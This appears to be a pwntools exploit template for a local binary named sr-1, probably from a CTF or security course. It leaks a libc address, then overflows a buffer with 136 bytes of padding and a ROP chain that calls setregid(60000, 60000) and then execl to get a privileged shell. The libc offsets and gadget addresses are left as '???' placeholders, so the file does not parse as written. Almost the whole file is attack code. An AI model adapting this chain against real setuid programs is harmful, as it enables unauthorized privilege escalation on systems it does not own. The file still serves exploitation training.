from pwn import *

# Open a horizontal tmux pane for anything pwntools wants to attach (gdb etc.).
context.terminal = ['tmux', 'splitw', '-h']

# Target binary and the child process the rest of the script talks to.
e = ELF("./sr-1")
p = process(e.path)

# Reply to the program's "how much do you want to dump?" prompt.
# NOTE: b"???" is the author's placeholder, left unfilled on purpose.
offset_to_libc_start_main_240 = b"???"

# Consume output up to the prompt, then answer it.
p.recvuntil(b"print?\n")
p.sendline(offset_to_libc_start_main_240)

# Read the dumped bytes up to the next prompt, dropping the 6-byte "Please"
# that recvuntil includes; the final 8 bytes are decoded as a little-endian
# 64-bit value and printed for inspection.
dumped = p.recvuntil("Please")[:-6]
libc240 = u64(dumped[-8:])
print(hex(libc240))


def rebase(offset):
    """Return *offset* relative to the leaked libc240 value."""
    return libc240 + offset


# Per-binary constants the author left as ??? placeholders; the file does not
# parse as Python until every one of them is replaced with an integer.
execl_offset = ???
str_offset = ???
setregid_offset = ???
p_rdi_r = ???
p_rsi_r15_r = ???

execl_addr = rebase(execl_offset)
str_addr = rebase(str_offset)
setregid_addr = rebase(setregid_offset)

# 136 filler bytes precede the first controlled return address.
padding = b'a' * 136

# First frame: both argument gadgets load 60000 before returning into setregid_addr.
setregid_frame = [p_rdi_r, 60000, p_rsi_r15_r, 60000, 60000, setregid_addr]

# Second frame: str_addr then two zeros before returning into execl_addr.
execl_frame = [p_rdi_r, str_addr, p_rsi_r15_r, 0, 0, execl_addr]

exploit = padding + b"".join(p64(word) for word in setregid_frame + execl_frame)

p.sendline(exploit)
p.interactive()